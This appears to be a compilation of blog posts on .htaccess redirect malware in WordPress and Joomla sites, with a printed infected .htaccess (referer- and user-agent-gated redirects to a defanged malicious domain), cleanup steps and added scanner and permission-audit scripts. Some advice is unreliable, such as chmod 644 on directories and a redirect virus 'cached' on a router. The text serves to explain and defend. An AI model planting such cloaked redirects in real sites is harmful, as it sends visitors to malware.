.htaccess mobile redirect virus: the JS:Redirector-MC trojan (mobile redirect) on a WordPress blog, and what this virus does

From what I have seen, a new form of this virus mainly affects sites hosted on untrusted shared servers, where account/sub-account users can "see" each other. In particular, all hosting accounts are created under the "virtual hosts" folder, and write access to the user folders under "virtual domains" is given to a general user, in most cases the reseller. This is a setup that does not use the usual WHM/cPanel hosting stack.

The .htaccess hack

The virus modifies the .htaccess files of the victim site. It adds lines/directives that redirect visitors arriving from high-traffic sites and portals (Yahoo, MSN, Google, Facebook, Yandex, Twitter, MySpace, etc.) to sites offering an "antivirus". This is the fake antivirus I wrote about in the preface.

This is what a victim's .htaccess looks like (the links below have been defanged and their content cannot be accessed):

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

# Referer checks. The %{...} braces and the [NC,OR] flags were mangled in the
# original listing and are restored here: without OR the conditions would be
# AND-ed and could never all match. Odnoklassniki and Vkontakte appeared
# machine-translated ("Classmates", "In contact with") in the listing.
RewriteCond %{HTTP_REFERER} .*Yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*AOL.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*LinkedIn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*LiveJasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*DoubleClick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*MSN.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Mother.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*MetaCrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*Dogpile.*$ [NC]
RewriteRule .*    (redirect target URL not shown in the original listing)

# Second block: Windows visitors requesting a path that is not an existing
# file, directory or image are redirected as well.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !(.*\.jpg$|.*\.gif$|.*\.png$)
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .*    (redirect target URL not shown in the original listing)

Those who use WordPress will find these lines in the .htaccess file in public_html. In addition, the virus creates an .htaccess file in the wp-content folder.

* There are also cases in which dns.thesoulfoodcafe.com or other addresses appear instead of peoriavascularsurgery.com.

What does this virus do?

Once redirected, visitors are welcomed with open arms by the message:

Attention!
The computer contains various signs of the presence of viruses and malware. Your virus protection system needs to be checked immediately!
The security system will perform a quick and free scan of your computer for viruses and malware.

No matter which button is pressed, we are taken to a "My Computer" page built to imitate the Windows XP look. It automatically starts a "scan", at the end of which we are told the computer is "infected".

After clicking OK or Cancel, a download of a file named setup.exe starts. This setup.exe is a fake antivirus that infects the system. Beyond the compromised links, the installed malware spreads further, and on top of that the victim is offered (fake) antivirus products to buy.
Those who have already come into contact with the virus can use this form. It is also recommended to scan the entire hard drive; I recommend Kaspersky Internet Security or Kaspersky Anti-Virus.

This type of virus infects visitors running Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 and Windows 95. To date there are no known cases of infection on Windows Vista or Windows 7.

How to remove this virus from the .htaccess file on the server, and how to prevent infection

1. Analyze suspicious files and remove the injected code. To make sure that .htaccess is not the only file touched, you must analyze all .php and .js files.

2. Overwrite the .htaccess file and set CHMOD 644 or 744, so that only the owner has write access.

3. When a hosting account is created for a website, a folder is automatically created in /home or /webroot, usually named after the username (the cPanel user, FTP user, etc.). To prevent one user from writing into another user's folder and passing the virus on, it is recommended that each user's folder be set as follows:

chmod 644 user_folder          (or 744 / 755; 644 is the one shown here)
chown -R user_name user_folder
chgrp -R user_name user_folder

Use ls -la to check that everything was done correctly. Something like this should appear:

drwx--x--x 12 dynamics dynamics 4096 May  6 14:51 dynamics/
drwx--x--x 10 duran    duran    4096 Mar  7 07:46 duran/
drwx--x--x 12 tube     tube     4096 Jan 29 11:23 tube/
drwxr-xr-x 14 express  express  4096 Feb 26  2009 express/
drwxr-xr-x  9 ezo      ezo      4096 May 19 01:09 ezo/
drwx--x--x  9 farm     farm     4096 ... 19 22:29 farm/

If one of the FTP users above has infected files, they cannot pass the virus on to another user on the host. This is a minimum security measure for protecting accounts hosted on a web server.
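The ownership and permission checks from step 3, as an added Python audit script that is not part of the original post. It walks a base directory such as /home and reports every account directory whose owner or group does not match its name, or that has a group/other write bit; the demo tree it builds is a constructed fixture under a temporary directory (names and modes chosen here, not taken from the post).

```python
import os
import pwd
import grp
import stat
import tempfile
from typing import List, Tuple

Finding = Tuple[str, str, str]   # (directory name, issue code, message)


def owner_name(uid: int) -> str:
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:            # uid with no passwd entry: report the number
        return str(uid)


def group_name(gid: int) -> str:
    try:
        return grp.getgrgid(gid).gr_name
    except KeyError:
        return str(gid)


def current_user_name() -> str:
    return owner_name(os.getuid())


def audit_user_dirs(base: str) -> List[Finding]:
    """Check each per-account directory under `base` (e.g. /home) the way the
    chown/chgrp/chmod steps intend: owner and group equal the directory name,
    and neither group nor others may write into it (711 or 755 are fine)."""
    findings: List[Finding] = []
    for name in sorted(os.listdir(base)):
        path = os.path.join(base, name)
        st = os.lstat(path)          # lstat: do not follow symlinked entries
        if not stat.S_ISDIR(st.st_mode):
            continue
        mode = stat.S_IMODE(st.st_mode)
        shown = f"{stat.filemode(st.st_mode)} {owner_name(st.st_uid)} {group_name(st.st_gid)} {name}/"
        if owner_name(st.st_uid) != name:
            findings.append((name, "owner", f"{shown}: run chown -R {name} {path}"))
        if group_name(st.st_gid) != name:
            findings.append((name, "group", f"{shown}: run chgrp -R {name} {path}"))
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((name, "writable", f"{shown}: other accounts can write here; chmod 711 {path}"))
    return findings


def build_demo_tree() -> str:
    """Constructed fixture: one correctly set-up account directory (named after
    the current user, mode 711) and one that any account on the host could write to."""
    base = tempfile.mkdtemp(prefix="hosting_demo_")
    good = os.path.join(base, current_user_name())
    os.mkdir(good)
    os.chmod(good, 0o711)
    bad = os.path.join(base, "otheruser")     # owned by us, so owner != name
    os.mkdir(bad)
    os.chmod(bad, 0o777)
    return base


if __name__ == "__main__":
    for _, _, msg in audit_user_dirs(build_demo_tree()):
        print(msg)
```

Run it as `python3 audit.py` for the demo, or call `audit_user_dirs("/home")` as root on a real shared host; the group check is advisory where a host uses a shared primary group.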

Common elements of the sites affected by this virus.

All affected sites redirect visitors to sites whose URL contains "/main.php?e=4&h".

This ".htaccess virus" affects any CMS that uses .htaccess (Joomla, WordPress, phpBB, etc.).

.htaccess redirect virus hack

Malicious/virus .htaccess "rewrite" and redirect

Last Monday, my six-month epic struggle against a malicious mobile redirect discovered by Yandex on two of my projects ended.
(Here's my story in two parts...)

Picture from here: http://rebill.me/showthread.php?t=1804
there are many more pictures and words about malicious mobile redirect.

One not so wonderful morning I received this letter from Yandex.Webmaster:

Hello, ***!

Code has been detected on the pages of your website **** that may be dangerous for visitors. Executing this code when visiting a site can lead to undesirable consequences for the user: infection of the computer with malware, unauthorized use of its resources, damage or theft of personal data.
Currently, the site appears in search results with the label “This site may threaten the security of your computer.”
Yandex does not evaluate the content of the site in any way and warns users that the site could be infected without the knowledge of its owners.
Please remove the malicious code. If the code is not found during a new scan, the mark in the search results will be removed. In order to remove the mark as quickly as possible, immediately after deleting the code, you can request a recheck of the site.


Sincerely,
Yandex.Webmaster
http://webmaster.yandex.ru

I could not immediately believe that there was malicious code on my project; it was much easier to believe that Yandex, with its behavioral algorithm, had made a mistake and falsely accused my increasingly popular project... After reading the information on the "Security" tab more carefully, and looking at the comments Yandex shows when I try to go from the search results to my infected site, I realized that it was about a malicious mobile redirect.

I started experimenting on mobile devices: from the Google search engine I went to the main page of my website, went to the page with content and... was redirected to some vague site with an address like aloobe.com with a single button “NEED TO URGENTLY UPDATE Adobe Player” - this was proof that Yandex was right and I was wrong...

God knows what it cost me to fight this malicious mobile redirect, to fight for the purity of my projects... I re-read mountains of literature, removed widgets and plugins, changed themes, and in a fit of despair even changed the hoster that had been proven over years; the search for the malicious redirect was conducted both inside the database and in the folders serving the projects.

In the end, everything turned out to be ridiculously simple, but I will tell you about that in the next article; today I will tell you about the plugin that closed the gap. I sent the site for re-checking, Yandex stopped marking my site as infected, readers returned and this problem no longer occurred on my projects! Or rather, the problem remained (because it took me six months to find a solution to it), but it was isolated from my readers and none of the visitors to my sites could fall into the clutches of swindlers.

The plugin is called Verve Mobile. At this point I was going to link to the plugin and end the post, but there was only one discussion left from this plugin on wordpress.org:
http://wordpress.org/support/plugin/verve-mobile-plugin.

To finish this article with dignity, I saved this popular plugin. You can download it. Of course, I won’t be able to provide support for it, but it works on my projects without problems, recognizing mobile devices and giving them site content in a special template “for viewing from mobile devices.”

The only drawback of the plugin that I discovered was that when the plugin was activated, I couldn’t . I circumvented this drawback by deactivating Verve Mobile for a few minutes, which is needed for authorization using OpenId.

PS Before installing the plugin, make sure that the .htaccess file located in the root directory of your site contains, in addition to the standard WordPress entry:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

only what you entered there yourself for some reason, and nothing unnecessary or inexplicable.

If you find some dubious redirects in the .htaccess file, remove all unnecessary things from it - this will most likely be a solution to the problem of malicious mobile redirects. Be careful and scroll to the bottom of the .htaccess file, sometimes attackers add a LOT of empty lines there so that their redirect code is not visible on the first page.
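As an added example (not code from either post above), a small Python scanner for the patterns both posts describe: ErrorDocument directives pointing to an external URL, RewriteRule redirects to external hosts gated on HTTP_REFERER or HTTP_USER_AGENT, and directives hidden behind a long run of blank lines. The infected sample it ships with is constructed; attacker.invalid is a placeholder host, and the 20-line padding threshold is an assumption.

```python
import re
import sys
from typing import List, Tuple

EXTERNAL_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
GATING_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")   # referer / UA cloaking
PADDING_THRESHOLD = 20      # assumed: blank lines in a row before a directive

Finding = Tuple[int, str]   # (line number, message)


def scan_htaccess(text: str) -> List[Finding]:
    """Flag redirect-to-external-URL patterns in the text of an .htaccess file."""
    findings: List[Finding] = []
    blank_run = 0
    pending: List[str] = []  # gating RewriteCond lines since the last RewriteRule
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            blank_run += 1
            continue
        if blank_run >= PADDING_THRESHOLD:
            findings.append((lineno, f"directive follows {blank_run} blank lines (hidden below the fold?)"))
        blank_run = 0
        parts = line.split()
        directive = parts[0].lower()        # Apache directives are case-insensitive
        if directive == "errordocument" and len(parts) >= 3 and EXTERNAL_URL.match(parts[2]):
            findings.append((lineno, f"ErrorDocument {parts[1]} sends visitors to {parts[2]}"))
        elif directive == "rewritecond" and len(parts) >= 3:
            var = parts[1].strip("%{}").upper()
            if var in GATING_VARS:
                pending.append(f"{var}@{lineno}")
        elif directive == "rewriterule" and len(parts) >= 3:
            if EXTERNAL_URL.match(parts[2]):
                gate = ", ".join(pending) or "unconditional"
                findings.append((lineno, f"RewriteRule redirects to {parts[2]} ({gate})"))
            pending = []                    # conditions apply only to the next rule
    return findings


# Standard WordPress block: the baseline that must produce no findings.
CLEAN_WORDPRESS = """# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Constructed infected sample: clean block, 200 padding lines, injected directives.
INFECTED_SAMPLE = CLEAN_WORDPRESS + "\n" * 200 + """ErrorDocument 403 http://attacker.invalid/main.php?e=3
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC]
RewriteRule .* http://attacker.invalid/main.php?e=4&h=1 [R,L]
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://attacker.invalid/main.php [R,L]
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else INFECTED_SAMPLE
    for lineno, msg in scan_htaccess(text):
        print(f"line {lineno}: {msg}")
```

Pass a real file path as the first argument to scan your own .htaccess; the scanner flags any external redirect, so review each hit rather than deleting blindly.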

To be continued…

Yesterday I was rushing around all day, and it just so happened that I was completely free only now, so the publication of the note promised the evening before yesterday was somewhat delayed.

Two days ago I briefly talked about the problems that have befallen me in recent days, and now I intend to describe the situation that I focused on in the previous post - viruses on my sites.

In general, it was like this.

On November 10, at around 5 p.m., a notification from Yandex with the subject “Potentially dangerous code has been detected on the site”, which was discovered on the pages of the site. According to Yandex, this code can be dangerous for visitors, and therefore, in the search results, my site was displayed with the mark .


Of course, this state of affairs did not suit me, and I hastened to check my site for extraneous code and other “rubbish” that could affect the appearance of viruses.
Along with this letter, I received a notification that money had been deposited into my account.


Message text:

Your subscriber account has received a payment in the amount of: 0 rub.
payment type: At the expense of Hostland.ru
and a bonus was credited in the amount of: 1668 rubles.
You have also been credited with domain bonuses in the amount of: 1


Be that as it may, there really is no redirect on my sites anymore - the problem was found and fixed, but as for what happened, well, who doesn’t?

Even despite all this, I am still satisfied with the work of my hosting, especially since in the end we managed to figure everything out and get rid of the so-called troubles. Replenishing my account was not an unimportant moment for me, and I will not hide, I think that it was very appropriate, after everything that I had to face.

In the note I have not yet mentioned that, in the process of searching for malicious code and on the advice of customer support specialists, I had to check my computer for viruses. In addition to all this, I checked my site for viruses using several online scanners, which naturally required additional time, which I believe was not wasted; being overly careful never hurt anyone.

No malicious code was detected on the site

Now the functionality of all my sites has been restored, there are no viruses or redirects on the sites, all restrictions from the Yandex search engine have been removed from the blog - in general, everything is fine. It’s good that everything ended well, but overall it turned out to be an interesting situation.


Well, how do you like this story in which a person with a chef's education proved to professional programmers a problem with their equipment, huh?

It amused me with its atmosphere and pleased me with the replenishment of my account, and it added new knowledge and experience; but the most unpleasant thing is that it made me nervous, and I shouldn't be nervous - it has a bad effect on my well-being!

In general, God forbid someone else faces the same problem, because until the very last moment only you will be considered a fool.

How to treat a search redirect virus in Joomla


28.04.2016

When administering a Joomla website, you periodically have to disinfect the system after a hack. One of the most unpleasant is the so-called search redirect virus: the site is compromised through a web shell, then search redirect code is inserted, so that your site still appears in the search engine but redirects the user to porn or Islamist sites. As a result, after clicking through you receive the following message:

Then the search engine starts showing a message that your site is infected or hacked, and in Yandex you even lose your ranking. The result is lost traffic, lost customers and no orders.

Recovery procedure.

1. Make a backup and download it.
2. If the hosting does not have an antivirus check, run an antivirus over the downloaded backup. This finds the shell files; in my case it was PHP.Shell.387, a type of malware that exploits a "hole" in the security of the CMS.

3. Delete the malicious files on the hosting.
4. Change the admin panel and FTP passwords.
5. Since a search for trojans gives no result, and manually searching for where the PHP code was embedded takes a long time and is not always effective, I make a backup "mix". A mix is any file backup of the site from before the infection; the database stays current (not from the backup), and then from the fresh backup we take the images folder with the pictures and the components/com_jshopping/files/img_products folder, where the product photos are.
Result: we are happy with the result.
P.S. What to do if there is no backup? ...or involve specialists for this. Perhaps a hosting backup will help, but it is overwritten automatically and most likely will not save you, as it will already contain the virus.

Subsequent prevention:

1. Don't skimp on this. Change the CMS if possible.
2. Definitely change hosting; you shouldn't skimp on this either. In my experience on timeweb, the same Joomla site was hacked twice, but that is only half the trouble. The key thing was that the hosting does not even scan its servers for viruses once a quarter. I recommend using a hosting provider that runs daily antivirus scans and also offers a free on-demand antivirus scan. For example, reg.ru.
3. Do not save FTP passwords.

Everyone has probably encountered automatic redirection to virus sites. You just need to skip the infected spam email and Redirect is right there. In this post, we will look at what it is and how to remove a redirect in the Chrome browser, Yandex Browser, Opera and Mozilla.

What is Redirect? In fact, a redirect is an automatic redirection from one site to another. By its intended purpose, Redirect is used when a site has changed its domain name. For example, an online store or commercial site has moved, and in order not to lose customers who visited the old address, a redirect is set up. However, if you go to a well-known site that has existed for a long time, and you are suddenly transferred to the site of the virtual casino Vulcan, it means that you are faced with a viral redirect.

In general, it is known that Redirect is not a dangerous virus: it will not harm the computer, but it is very annoying and also slows down the browser. Moreover, if, like me, you like to play games in your spare time, you will notice its negative impact immediately. At the first signs of this virus, you need to get rid of it as quickly as possible.

How to determine that you have this Redirect virus?

  1. Your browser is slowing down.
  2. Sometimes when you access a website, you are redirected to an advertising page.
  3. Quite unexpectedly, advertising banners appear on the open page.

To remove Redirect, you can first simply try clearing the cache. Sometimes the problem may be hidden in the router. Since the virus is cached on your device, you could pick it up somewhere on someone else’s router, bring it home and infect all the equipment connected to your router. Then you need to clean the router and change the passwords. Then clear the caches of all devices. If this does not help, then you will have to take a couple of minutes to thoroughly clean the entire system. We have figured out what Redirect is, now we move on to the next stage - clearing redirects.

How to remove Redirect

How did I remove Redirect from the site? First, to be on the safe side, I saved all the important data from the computer to a removable hard drive. Then I removed the old antivirus and installed a new one. You can install traditional Dr.Web or NOD32. I decided to try Avast, which was praised by a friend who quite successfully got rid of this infection with a redirect. If you do not yet have cleaning applications such as SpyHunter and CCleaner installed, don’t be lazy. They will help you clean the registry.

  1. So, first open the “Task Manager” and close all unknown processes.
  2. We run a scan with an antivirus program. It can last from 5 minutes to half an hour.
  3. We check all hard drives and browsers.
  4. We treat all malware that cannot be treated - we simply remove it. You should avoid rebooting at this stage.
  5. We perform a full system scan using SpyHunter or CCleaner.
  6. During the scanning process, the system will again offer to reboot - we refuse. We clean all malicious objects.

In most cases, the redirect directs you to sites with advertising or fake services, such as search engines. I have already described several dozen instructions for removing such redirects. Therefore, you need to follow all the steps below and read the article intended for the viral site to which you are being redirected. To avoid this happening again.

The most popular opening sites: